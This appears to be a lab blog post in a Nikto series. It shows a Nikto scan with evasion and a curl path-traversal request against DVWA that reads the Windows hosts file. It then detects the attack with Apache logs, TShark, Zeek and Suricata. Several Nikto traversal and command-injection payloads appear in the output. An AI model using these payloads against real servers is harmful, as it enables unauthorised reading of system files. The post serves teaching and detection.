This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection.
From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.
The Hack - Remote File Retrieval with evasion type 4 -> Prepend long random string
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 5 -evasion 4 - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 10.0.0.106 + Target Hostname: 10.0.0.106 + Target Port: 80 + Using Encoding: Prepend long random string + Start Time: 2023-06-06 15:13:18 (GMT-4) --------------------------------------------------------------------------- ... + /index.php?download=/winnt/win.ini - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server. + /index.php?download=/windows/win.ini - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server. + /index.php?download=/etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server. + /index.php?|=../../../../../../../../../etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem. + /index.php?page=../../../../../../../../../../etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php) ... + 925 requests: 0 error(s) and 6 item(s) reported on remote host + End Time: 2023-06-06 15:13:20 (GMT-4) (2 seconds) ---------------------------------------------------------------------------
Above everything shows 302. Hence I'm concluding this test was not successful.
Besides, we already learned previously that index.php does not have a parameter name "page" and there is none for "download". More importantly, /etc/passwd is found on Linux not Windows so those results are not valid for this purpose.
Leveraging my knowledge of the DVWA app to actually exploit this. Rather than using the web application directly, I will leverage curl to attempt to read the "c:\windows\system32\drivers\etc\hosts" file.
If we inspect the page, we see a "page" parameter. By default, the value is "include.php"
http://10.0.0.106/dvwa/vulnerabilities/fi/?page=include.php
Using curl:
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ curl --request GET --location "http://10.0.0.106/dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts" # Copyright (c) 1993-2009 Microsoft Corp. # ... # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost 10.0.0.107 mycooldomain.cdw <!DOCTYPE html> <html lang="en-GB"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)</title> ...
We can see above, just before the original page loads, the next from the host files.
Transitioning to log analysis.
Detect - Log Analysis
Looking at the first entry in the access.log we see a large set of random characters, prepended to the query.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ cat access.log | head -1 10.0.0.107 - - [06/Jun/2023:15:12:49 -0400] "GET /P4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmv/../ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
Looking for something meaningful. Looking for entries where the response code is 200.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ cat access.log | grep --perl-regexp "\s+200\s+" 10.0.0.107 - - [06/Jun/2023:15:12:50 -0400] "GET /0RHy...JUNK...EkwGH/../favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "TRACE /eaXa8sc4...JUNK...Wlt5N/../ HTTP/1.0" 200 721 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
Nothing meaningful above. What else is there?
Looking at the paths. How many were there?
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ cat access.log | grep --perl-regexp "\.\..*?HTTP" --only-matching | \
sort --unique | awk --field-separator="HTTP" '{ print $1 }' | wc --lines 667
Getting a snapshot of some of these.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ cat access.log | grep --perl-regexp "\.\..*?HTTP" --only-matching | sort --unique | \
awk --field-separator="HTTP" '{ print $1 }' ./0.alz ../0.cer ../0.egg ... ../autohtml.php?op=modload&mainfile=x&name=/etc/passwd ../backup.alz ... ./cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 ../cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 ../cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 ../cgi-bin/guestbook.cgi ../cgi-bin/helpdesk.cgi ../cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 ../cgi-bin/htgrep?file=index.html&hdr=/etc/passwd ../cgi-bin/htmlscript?../../../../../../../../../../etc/passwd ../cgi-bin/htsearch?exclude=%60/etc/passwd%60 ... ../cgi-bin/input2.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ ../cgi-bin/input.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\ ... ./magento/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility ../magento/magmi-importer/web/download_file.php?file=../../app/etc/local.xml ../magento/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd ../magento/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility ...
Moving on to what an actual attack looks like, as we already know from above, there were only 2 entries that returned response code 200.
What does the log look like for an actual successful attack?
10.0.0.107 - - [07/Jun/2023:14:36:24 -0400] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 4005 "-" "curl/7.88.1"
At this point, we need to review the system to see if that file exists. If it does, then you have to wonder what information was exposed. Do note, all systems tend to have a host file and Windows definitely have the host file in that location. Maybe the packet analysis will help to add more clarity.
Detect - Packet Analysis
Setup for packet analysis. Capture packets on ports 80,443
Get the streams where the response code was 200
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ tshark -n -r tuning_5.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.stream -e tcp.len -E header=y ip.src ip.dst tcp.srcport tcp.stream tcp.len 10.0.0.106 10.0.0.107 80 4 549 10.0.0.106 10.0.0.107 80 8 187 10.0.0.106 10.0.0.107 80 9 0
Looking at stream 4, we see it is the favicon.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r tuning_5.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp "\s+200\s+" --before-context=7 --after-context=10
GET /0RHy...JUNK...kwGH/../favicon.ico HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 10.0.0.106
Connection: Keep-Alive
1460
HTTP/1.1 200 OK
Date: Tue, 06 Jun 2023 19:12:50 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 16 Jul 2015 15:32:32 GMT
ETag: "78ae-51affc7a4c400"
Accept-Ranges: bytes
Content-Length: 30894
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive
Content-Type: image/x-icon
Detecting the actual attack via packet analysis
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ tshark -n -r fi.pcap 1 0.000000000 10.0.0.107 → 10.0.0.106 TCP 74 59456 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=1949226976 TSecr=0 WS=128 2 0.000252977 10.0.0.106 → 10.0.0.107 TCP 66 80 → 59456 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM 3 0.000288567 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0 4 0.000369486 10.0.0.107 → 10.0.0.106 HTTP 210 GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1 5 0.009548711 10.0.0.106 → 10.0.0.107 TCP 1514 HTTP/1.1 200 OK [TCP segment of a reassembled PDU] 6 0.009548962 10.0.0.106 → 10.0.0.107 TCP 1514 80 → 59456 [ACK] Seq=1461 Ack=157 Win=2102272 Len=1460 [TCP segment of a reassembled PDU] 7 0.009548998 10.0.0.106 → 10.0.0.107 TCP 1514 80 → 59456 [ACK] Seq=2921 Ack=157 Win=2102272 Len=1460 [TCP segment of a reassembled PDU] 8 0.009549028 10.0.0.106 → 10.0.0.107 HTTP 125 HTTP/1.1 200 OK (text/html) 9 0.009599451 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=157 Ack=1461 Win=64128 Len=0 10 0.009615795 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=157 Ack=2921 Win=63488 Len=0 11 0.009623869 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=157 Ack=4381 Win=62592 Len=0 12 0.009635647 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=157 Ack=4452 Win=62592 Len=0 13 0.011856522 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [FIN, ACK] Seq=157 Ack=4452 Win=64128 Len=0 14 0.012227611 10.0.0.106 → 10.0.0.107 TCP 60 80 → 59456 [ACK] Seq=4452 Ack=158 Win=2102272 Len=0 15 0.012227889 10.0.0.106 → 10.0.0.107 TCP 60 80 → 59456 [FIN, ACK] Seq=4452 Ack=158 Win=2102272 Len=0 16 0.012271428 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=158 Ack=4453 Win=64128 Len=0
How many conversations were part of this communication?
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ tshark -n -r fi.pcap -q -z conv,tcp ================================================================================ TCP Conversations Filter:<No Filter> | <- | | -> | | Total | Relative | Duration | | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | | 10.0.0.107:59456 <-> 10.0.0.106:80 7 4,853 bytes 9 662 bytes 16 5,515 bytes 0.000000000 0.0123 ================================================================================
Following stream 0.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r fi.pcap -q -z follow,tcp,ascii,0
===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 10.0.0.107:59456
Node 1: 10.0.0.106:80
156
GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
Host: 10.0.0.106
User-Agent: curl/7.88.1
Accept: */*
1460
HTTP/1.1 200 OK
Date: Wed, 07 Jun 2023 18:36:24 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
X-Powered-By: PHP/8.0.28
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=vba6pa2had7c86op2lnluit7v5; expires=Thu, 08-Jun-2023 18:36:24 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4005
Content-Type: text/html;charset=utf-8
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
#.127.0.0.1 localhost
#.::1 localhost
10.0.0.107 mycooldomain.cdw
<!DOCTYPE html>
The packet analysis confirms our log analysis findings. The file was successfully retrieved, hence we see the full contents above. As we say in the SANS SEC503 - Network Monitoring and Threat Detection - Packets or it did not happen. This is clear evidence of this.
Transitioning to Zeek
Detect - Zeek Analysis
Setup Zeek.
┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff] └─$ sudo zeek --iface any --no-checksums
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ cat http.log | grep --perl-regexp "\s+200\s+" | head --lines=1 1686078799.407770 C0NrKC2wb8TbvK0iZb 10.0.0.107 39234 10.0.0.106 80 53 GET 10.0.0.106 /0RHy...JUNK...wGH/../favicon.ico - 1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 - 0 30894 200 OK - - (empty) - - - - - - F0bkFD4SgqIlRoiaQf - image/x-icon
Looking at the the actual attack traffic. We see similar to what we saw in our log analysis of the access.log file.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ cat http.log 1686163005.810950 C7ccD83WRZobza0Lj9 10.0.0.107 59456 10.0.0.106 80 1 GET 10.0.0.106 /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts - 1.1 curl/7.88.1 - 0 4005 200 OK
Detect - Suricata (IDS) Analysis
Setup Suricata to operate in IDS mode
┌──(kali㉿securitynik)-[/var/log/suricata] └─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all
What did the IDS produce? Looking at the first 5 entries.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5 120 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt 16 1:2018056:4] ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY. 6 1:2021951:3] ET EXPLOIT Possible Magento Directory Traversal Attempt 4 1:2101402:9] GPL EXPLOIT iissamples access 4 1:2101245:13] GPL EXPLOIT ISAPI .idq access
Nothing above that I would like to dig deeper into.
Looking at the actual attack from the IDS perspective.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ cat fast.log 06/07/2023-14:36:45.810950 [**] [1:2009362:7] ET WEB_SERVER /system32/ in Uri - Possible Protected Directory Access Attempt [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.0.0.107:59456 -> 10.0.0.106:80
Looking at the packet.
┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5] └─$ cat alert-debug.log +================ TIME: 06/07/2023-14:36:45.810950 PKT SRC: wire/pcap SRC IP: 10.0.0.107 DST IP: 10.0.0.106 PROTO: 6 SRC PORT: 59456 DST PORT: 80 TCP SEQ: 2738297529 TCP ACK: 2364260716 FLOW: to_server: TRUE, to_client: FALSE FLOW Start TS: 06/07/2023-14:36:45.810580 FLOW PKTS TODST: 3 FLOW PKTS TOSRC: 1 FLOW Total Bytes: 404 FLOW IPONLY SET: TOSERVER: TRUE, TOCLIENT: TRUE FLOW ACTION: DROP: FALSE FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE FLOW APP_LAYER: DETECTED: TRUE, PROTO 1 PACKET LEN: 210 PACKET: 0000 08 00 27 88 B8 34 08 00 27 DB 96 6A 08 00 45 00 ..'..4.. '..j..E. 0010 00 C4 75 E1 40 00 40 06 AF 7E 0A 00 00 6B 0A 00 ..u.@.@. .~...k.. 0020 00 6A E8 40 00 50 A3 37 1A B9 8C EB C1 6C 50 18 .j.@.P.7 .....lP. 0030 01 F6 15 8B 00 00 47 45 54 20 2F 64 76 77 61 2F ......GE T /dvwa/ 0040 76 75 6C 6E 65 72 61 62 69 6C 69 74 69 65 73 2F vulnerab ilities/ 0050 66 69 2F 3F 70 61 67 65 3D 2E 2E 2F 2E 2E 2F 2E fi/?page =../../. 0060 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 77 69 6E 64 6F ./../../ ../windo 0070 77 73 2F 73 79 73 74 65 6D 33 32 2F 64 72 69 76 ws/syste m32/driv 0080 65 72 73 2F 65 74 63 2F 68 6F 73 74 73 20 48 54 ers/etc/ hosts HT 0090 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 30 TP/1.1.. Host: 10 00A0 2E 30 2E 30 2E 31 30 36 0D 0A 55 73 65 72 2D 41 .0.0.106 ..User-A 00B0 67 65 6E 74 3A 20 63 75 72 6C 2F 37 2E 38 38 2E gent: cu rl/7.88. 00C0 31 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 1..Accep t: */*.. 00D0 0D 0A .. ...
Nothing else to look at here.
Hope you enjoyed the posts in this series:
No comments:
Post a Comment